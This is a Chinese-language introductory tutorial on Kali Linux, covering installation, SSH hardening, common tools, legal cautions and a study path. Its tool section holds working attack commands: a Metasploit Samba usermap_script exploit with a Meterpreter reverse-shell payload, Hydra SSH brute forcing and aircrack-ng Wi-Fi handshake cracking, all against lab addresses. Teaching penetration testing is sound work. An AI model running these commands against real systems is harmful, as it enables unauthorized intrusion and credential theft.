当前位置: 首页 > news >正文

Kali Linux

一、Kali Linux 是什么?

Kali Linux 是一款基于 Debian 的 Linux 发行版,专门面向渗透测试和网络安全审计。由 Offensive Security 维护,集成了数百个安全工具,用于:

- 信息收集(扫描、探测)
- 漏洞评估与利用
- 密码攻击与破解
- 无线网络审计
- 社会工程学攻击
- 数字取证与渗透测试报告

一句话概括:Kali 是黑客/安全工程师的“瑞士军刀”。



二、为什么选择 Kali?

1. 工具齐全:预装了 Nmap、Metasploit、Burp Suite、Aircrack-ng、John the Ripper 等大量工具。
2. 滚动更新:基于 Debian Rolling,软件包更新及时。
3. 多平台支持:支持 x86/64、ARM(树莓派等),也可以在虚拟机、WSL、USB 上运行。
4. 安全优化:默认使用非 root 用户(新版已改),并提供多种安全加固选项。
5. 文档丰富:官方文档、教程和社区资源非常多。



三、Kali 的安装方式概览

1. 虚拟机安装(推荐入门)

- 使用 VMware、VirtualBox 等创建虚拟机
- 下载 ISO:https://www.kali.org/get-kali/
- 选择“Graphical Install”或“Install”
- 分区建议:
- / :20GB 以上
- swap :内存的 1~2 倍
- 安装完成后:
bash
sudo apt update && sudo apt full-upgrade -y


2. WSL 安装(适合 Windows 用户)

在 Windows 10/11 上启用 WSL 后:

powershell
wsl --install
wsl --set-default-version 2


然后在 Microsoft Store 搜索 “Kali Linux” 安装,启动后初始化用户名和密码。

提示:WSL 下没有图形界面,可通过 kex 启动图形环境(需要先安装: sudo apt install -y kali-win-kex )。

3. 物理机/USB 启动

- 将 ISO 写入 U 盘(Rufus、Etcher 等)
- 从 U 盘启动,选择“Live”模式试用或安装到硬盘
- 适合做移动渗透测试平台



四、Kali 的基本配置与安全习惯

1. 默认用户与权限

新版 Kali 默认不再使用 root 登录,而是普通用户 + sudo:

bash
sudo -i # 切换到 root
sudo whoami # 验证是否有 sudo 权限


如果需要允许密码登录 root(不推荐远程):

bash
sudo passwd root


2. 换源与更新系统

编辑 /etc/apt/sources.list ,使用国内源可加速:

bash
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib


更新并升级:

bash
sudo apt update
sudo apt full-upgrade -y
sudo apt autoremove -y


3. SSH 服务(远程登录)

bash
sudo systemctl enable --now ssh
sudo systemctl status ssh


为了安全,建议:

- 禁用密码登录,只允许密钥登录
- 修改默认端口(如 22 -> 2222)

编辑 /etc/ssh/sshd_config :

conf
Port 2222
PasswordAuthentication no
PermitRootLogin prohibit-password


重启服务:

bash
sudo systemctl restart ssh




五、常用工具分类与示例

下面列出常见工具分类和典型命令示例,方便快速上手。

1. 信息收集 / 扫描

Nmap(网络扫描)

bash
nmap -sP 192.168.1.0/24 # 存活主机探测
nmap -sV -p- 192.168.1.10 # 全端口 + 版本探测
nmap -A -T4 192.168.1.10 # 全面扫描(较慢)


Netdiscover(ARP 扫描)

bash
sudo netdiscover -r 192.168.1.0/24


2. 漏洞评估与利用

Metasploit Framework

启动:

bash
msfconsole


示例:扫描 SMB 漏洞并尝试利用(仅供授权测试):

bash
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf auxiliary(smb_version) > run

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.1.10
msf exploit(usermap_script) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf exploit(usermap_script) > set LHOST 192.168.1.5
msf exploit(usermap_script) > run


3. Web 渗透测试

Burp Suite(社区版预装)

- 启动: burpsuite
- 配置浏览器代理到 127.0.0.1:8080
- 抓包、修改、重放、爆破、扫描漏洞

Dirb / Gobuster(目录扫描)

bash
dirb http://192.168.1.10

gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/common.txt


4. 密码攻击与破解

John the Ripper

bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt


Hydra(在线暴力破解)

bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.10 ssh


5. 无线网络审计

Aircrack-ng 套件

1. 查看无线网卡:

bash
iwconfig
ip link show


2. 开启监听模式:

bash
sudo airmon-ng check kill
sudo airmon-ng start wlan0


3. 扫描附近 AP:

bash
sudo airodump-ng wlan0mon


4. 抓取握手包(需在目标 AP 上有客户端连接时成功率更高):

bash
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon


5. 使用字典破解:

bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap


注意:未经授权测试无线网络是违法的,务必在自己或授权的网络环境中练习。



六、Kali 的使用规范与法律风险

1. 只在授权范围内测试
- 渗透测试前必须有书面授权
- 未授权扫描、攻击他人系统属于违法行为
2. 注意日志与痕迹
- 真实测试中要记录操作过程
- 避免留下不必要的痕迹(合理使用代理、VPN 等)
3. 不要用于恶意行为
- 攻击网站、服务器、个人设备等都会触犯法律
- 安全工具是“双刃剑”,责任在使用者



七、学习路线建议

如果你想系统学习 Kali 和网络安全,可以按以下顺序:

1. Linux 基础:命令行、权限、进程、网络配置
2. 计算机网络:TCP/IP、HTTP、DNS、ARP、路由等
3. Web 基础:HTML、CSS、JavaScript、HTTP 请求/响应、常见框架
4. 常见漏洞原理:SQL 注入、XSS、CSRF、SSRF、文件上传、命令注入等
5. Kali 工具实战:从 Metasploitable、VulnHub、Hack The Box 等靶场练习
6. 安全运维与防御:防火墙、入侵检测、日志审计、加固配置



八、总结

Kali Linux 是安全从业者的重要工具,但工具本身并不代表“黑客技术”。真正的核心是:

- 理解漏洞原理
- 掌握网络与系统知识
- 遵守法律和伦理
- 持续学习与实践

http://www.jsqmd.com/news/97983/

相关文章:

  • 互联网大厂Java面试实战:从核心语言到微服务与AI技术全覆盖解析
  • 揭秘空间转录组数据差异表达:如何用R语言精准挖掘关键基因
  • 上交最新!端到端VLA综述:广义范式下的统一视角
  • 国产信创动环监控系统是什么?具备哪些核心优势?
  • 《从源码到实战:Kali Linux定制化漏洞挖掘与EXP开发全栈解析》
  • 如何实现动环监控系统的国产化与智能化?
  • 超越语法糖:从 Python 基础语法窥探其对象模型与协议
  • 还在为高维数据困扰?,一文搞定空间转录组R语言降维全流程
  • 南大一篇84页的统一多模态理解和生成综述......
  • 25、Linux使用指南:资源、优势与许可详解
  • 白山智算GPU云服务器深入测评攻略
  • 世岩清上:作为普通人,我们如何搭乘“人工智能+”快车?
  • 45万亿!中国智驾的新风口来了
  • 大同市软件公司哪家专业
  • SIEMENS罗宾康系列变频器LDZ14501002.260:标志硬件架构迭代的关键版本
  • 【高斯泼溅】Mapmost分区训练,让大场景3DGS建模从此高效且高质
  • 【临床数据ROC曲线优化全攻略】:掌握R语言高效建模的7大核心技巧
  • 揭秘临床诊断模型性能瓶颈:如何用R语言优化ROC曲线提升AUC值
  • 从序列到结构仅需7步,R语言带你玩转蛋白质空间构象预测
  • 10、线程同步的复杂性与解决方案
  • FaceFusion开源项目深度解析:基于GitHub的高精度人脸融合AI工具
  • EHD-1500三机一体式除湿干燥机使用特点 - 品牌推荐大师
  • 2025年最新GPU算力租赁平台测评
  • 大同市软件公司哪家技术强
  • 数据科学家都在用的R语言同化技巧,环境监测精度提升90%的秘密
  • 揭秘环境监测中的异常值陷阱:如何用R语言精准识别与处理?
  • 【致敬群星】第十期:西蒙斯 —— 用数学公式征服华尔街的 “量化之王“
  • 【农业产量预测R模型评估】:20年专家揭秘精准建模5大核心指标
  • R量子计算电路优化完全指南(从入门到高阶的7个关键步骤)
  • 第135篇:美国APT的苹果手机“三角测量“行动是如何被溯源发现的